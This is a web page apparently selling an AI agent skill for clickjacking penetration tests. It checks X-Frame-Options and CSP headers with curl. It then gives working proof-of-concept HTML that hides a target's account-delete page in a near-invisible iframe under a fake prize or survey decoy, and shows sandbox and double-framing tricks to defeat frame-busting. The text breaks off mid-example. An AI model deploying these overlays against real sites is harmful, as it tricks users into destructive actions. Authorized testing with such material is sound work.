Claude
Skills
Sign in
Back

performing-clickjacking-attack-test

Included with Lifetime
$97 forever

Testing web applications for clickjacking vulnerabilities by assessing frame embedding controls and crafting proof-of-concept overlay attacks during authorized security assessments.

Securitypenetration-testingclickjackingui-redressingweb-securityowaspx-frame-optionsscripts

What this skill does


# Performing Clickjacking Attack Test

## When to Use

- During authorized penetration tests when assessing UI redressing vulnerabilities
- When testing whether sensitive actions (delete account, transfer funds, change settings) can be performed via clickjacking
- For evaluating the effectiveness of X-Frame-Options and Content-Security-Policy frame-ancestors directives
- When assessing applications that process one-click actions without additional confirmation
- During security audits of applications handling financial transactions or account management

## Prerequisites

- **Authorization**: Written penetration testing agreement for the target
- **Web browser**: Modern browser for testing iframe embedding
- **Local web server**: Python `http.server` or similar for hosting PoC pages
- **Burp Suite**: For examining response headers
- **HTML/CSS knowledge**: For crafting clickjacking overlay pages
- **curl**: For checking framing headers on target pages


> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

## Workflow

### Step 1: Check Frame Embedding Protections

Examine response headers for anti-clickjacking defenses.

```bash
# Check X-Frame-Options header
curl -s -I "https://target.example.com/" | grep -i "x-frame-options"
# Expected values:
# X-Frame-Options: DENY (blocks all framing)
# X-Frame-Options: SAMEORIGIN (allows same-origin framing)
# X-Frame-Options: ALLOW-FROM https://trusted.com (deprecated, limited support)

# Check Content-Security-Policy frame-ancestors directive
curl -s -I "https://target.example.com/" | grep -i "content-security-policy"
# Look for: frame-ancestors 'none' or frame-ancestors 'self'
# frame-ancestors 'none' = equivalent to DENY
# frame-ancestors 'self' = equivalent to SAMEORIGIN

# Test multiple sensitive pages
for page in / /account/settings /account/delete /transfer \
  /admin/dashboard /change-password /change-email; do
  echo -n "$page: "
  headers=$(curl -s -I "https://target.example.com$page")
  xfo=$(echo "$headers" | grep -i "x-frame-options" | tr -d '\r')
  csp=$(echo "$headers" | grep -i "content-security-policy" | grep -o "frame-ancestors[^;]*" | tr -d '\r')
  if [ -z "$xfo" ] && [ -z "$csp" ]; then
    echo "NO PROTECTION"
  else
    echo "${xfo:-none} | ${csp:-none}"
  fi
done

# Check if JavaScript frame-busting is used (weak protection)
curl -s "https://target.example.com/" | grep -i "top.location\|parent.location\|frameElement"
```

### Step 2: Test Basic Iframe Embedding

Attempt to embed the target page in an iframe to confirm vulnerability.

```html
<!-- basic-frame-test.html -->
<html>
<head><title>Clickjacking Frame Test</title></head>
<body>
<h1>Frame Embedding Test</h1>
<p>If the target page loads below, it is vulnerable to clickjacking.</p>

<!-- Test basic framing -->
<iframe src="https://target.example.com/account/settings"
        width="800" height="600"
        style="border: 2px solid red;">
</iframe>

<p>If you see "Refused to display" in console or blank iframe,
   the page has frame protection.</p>
</body>
</html>
```

```bash
# Host the test page
cd /tmp
cat > frame-test.html << 'EOF'
<html>
<body>
<h1>Clickjacking Test</h1>
<iframe src="https://target.example.com/account/settings"
        width="800" height="600"></iframe>
</body>
</html>
EOF
python3 -m http.server 8888
# Open http://localhost:8888/frame-test.html in browser
# Check browser console for framing errors
```

### Step 3: Craft Clickjacking Proof of Concept

Build an overlay attack that tricks users into clicking hidden elements.

```html
<!-- clickjacking-poc.html -->
<html>
<head>
<title>Win a Prize!</title>
<style>
  body {
    margin: 0;
    padding: 0;
    font-family: Arial, sans-serif;
  }

  /* Invisible iframe containing target page */
  #target-frame {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    opacity: 0.0001;  /* Nearly invisible */
    z-index: 2;       /* On top of decoy */
    border: none;
  }

  /* Decoy content that tricks the user */
  #decoy {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    z-index: 1;
    background: white;
  }

  /* Position the "Click here" button exactly over the target's
     sensitive button (adjust top/left values based on target layout) */
  #click-bait {
    position: absolute;
    top: 350px;    /* Align with target's "Delete Account" button */
    left: 400px;   /* Align horizontally */
    padding: 15px 30px;
    background: #4CAF50;
    color: white;
    font-size: 18px;
    cursor: pointer;
    border: none;
    border-radius: 5px;
  }
</style>
</head>
<body>

<!-- Decoy content visible to the user -->
<div id="decoy">
  <h1 style="text-align:center; margin-top:100px;">
    Congratulations! You Won!
  </h1>
  <p style="text-align:center;">
    Click the button below to claim your prize
  </p>
  <button id="click-bait">CLAIM PRIZE</button>
</div>

<!-- Hidden iframe with target's sensitive action -->
<iframe id="target-frame"
  src="https://target.example.com/account/delete"
  scrolling="no">
</iframe>

</body>
</html>
```

### Step 4: Create Multi-Step Clickjacking Attack

For actions requiring multiple clicks, create a multi-step overlay.

```html
<!-- multi-step-clickjacking.html -->
<html>
<head>
<title>Complete Survey</title>
<style>
  #target-frame {
    position: absolute;
    width: 100%;
    height: 100%;
    opacity: 0.0001;
    z-index: 2;
    border: none;
  }
  #step-container {
    text-align: center;
    margin-top: 200px;
    z-index: 1;
    position: relative;
  }
  .step { display: none; }
  .step.active { display: block; }
  .btn {
    padding: 15px 40px;
    font-size: 18px;
    background: #2196F3;
    color: white;
    border: none;
    cursor: pointer;
    margin-top: 20px;
  }
</style>
</head>
<body>

<div id="step-container">
  <!-- Step 1: Click aligns with "Settings" link on target -->
  <div class="step active" id="step1">
    <h2>Step 1: Select your reward</h2>
    <button class="btn" onclick="nextStep()"
      style="position:absolute; top:200px; left:300px;">
      Gold Package
    </button>
  </div>

  <!-- Step 2: Click aligns with "Delete Account" button -->
  <div class="step" id="step2">
    <h2>Step 2: Confirm your choice</h2>
    <button class="btn" onclick="nextStep()"
      style="position:absolute; top:350px; left:400px;">
      Confirm
    </button>
  </div>

  <!-- Step 3: Click aligns with "Yes, I'm sure" confirmation -->
  <div class="step" id="step3">
    <h2>Step 3: Claim reward!</h2>
    <button class="btn"
      style="position:absolute; top:400px; left:450px;">
      Claim Now!
    </button>
  </div>
</div>

<iframe id="target-frame"
  src="https://target.example.com/account/settings">
</iframe>

<script>
var currentStep = 1;
function nextStep() {
  document.getElementById('step' + currentStep).classList.remove('active');
  currentStep++;
  document.getElementById('step' + currentStep).classList.add('active');
  // Optionally change iframe src for multi-page flows
}
</script>
</body>
</html>
```

### Step 5: Test Frame-Busting Bypass Techniques

If JavaScript-based frame protection is used, attempt to bypass it.

```html
<!-- Bypass frame-busting JavaScript -->

<!-- Technique 1: sandbox attribute blocks top-level navigation -->
<iframe src="https://target.example.com/account/settings"
  sandbox="allow-scripts allow-forms allow-same-origin"
  width="800" height="600">
</iframe>
<!-- sandbox without allow-top-navigation prevents frame-busting -->

<!-- Technique 2: Double framing -->
<!-- If target checks: if (top !== self) top.location = self.location -->
<!-- Frame the page through an intermediate page that also frames -->
<iframe src="intermediate.html" width="800" height="600"></iframe>
<!-- intermediate.html contains: <iframe src="https://target.example.com
Files: 4
Size: 33.9 KB
Complexity: 65/100
Category: Security
Source: https://github.com/mukul975/anthropic-cybersecurity-skills/tree/main/skills/performing-clickjacking-attack-test

Related in Security

mac-ops

Included

Comprehensive macOS workstation operations — diagnose kernel panics, identify failing drives, audit launchd startup items, decode wake reasons, triage TCC permission denials, manage APFS snapshots, recover from no-boot. Use for: Mac is slow, slow bootup, won't boot, kernel panic, kernel_task hot, mds_stores CPU, photoanalysisd, cloudd, login loop, gray screen, sleep wake failure, drive failing, IO errors, APFS snapshots eating space, Time Machine local snapshots, Spotlight indexing, launchd, LaunchAgent, LaunchDaemon, login items, TCC permissions, Full Disk Access, Screen Recording denied, Gatekeeper, quarantine, com.apple.quarantine, app is damaged, helper tool, /Library/PrivilegedHelperTools, pmset, wake reasons, dark wake, sysdiagnose, panic.ips, DiagnosticReports, configuration profile, MDM profile, remote diagnostics over SSH.

Securityscripts

a11y-audit

Included

Run accessibility audits on web projects combining automated scanning (axe-core, Lighthouse) with WCAG 2.1 AA compliance mapping, manual check guidance, and structured reporting. Output is configurable: markdown report only, markdown plus machine-readable JSON, or markdown plus issue tracker integration. Use this skill whenever the user mentions "accessibility audit", "a11y audit", "WCAG audit", "accessibility check", "compliance scan", or asks to check a web project for accessibility issues. Also trigger when the user wants to verify WCAG conformance or map findings to a specific standard (CAN-ASC-6.2, EN 301 549, ADA/AODA).

Securityscripts

erpclaw

Included

AI-native ERP system with self-extending OS. Full accounting, invoicing, inventory, purchasing, tax, billing, HR, payroll, advanced accounting (ASC 606/842, intercompany, consolidation), and financial reporting. 413 actions across 14 domains, 43 expansion modules. Constitutional guardrails, adversarial audit, schema migration. Double-entry GL, immutable audit trail, US GAAP.

Securityscripts

assess

Included

Assesses and rates quality 0-10 across multiple dimensions (correctness, maintainability, security, performance, testability, simplicity) with pros/cons analysis. Compares against project conventions and prior decisions from memory. Produces structured evaluation reports with actionable improvement suggestions. Use when evaluating code, designs, architectures, or comparing alternative approaches.

Securityscripts

spring-boot-security-jwt

Included

Provides JWT authentication and authorization patterns for Spring Boot 3.5.x covering token generation with JJWT, Bearer/cookie authentication, database/OAuth2 integration, and RBAC/permission-based access control using Spring Security 6.x. Use when implementing authentication or authorization in Spring Boot applications.

Securityscripts

code-hardcode-audit

Included

Detect hardcoded values, magic numbers, and leaked secrets. TRIGGERS - hardcode audit, magic numbers, PLR2004, secret scanning.

Securityscripts
Sign up & unlock — $97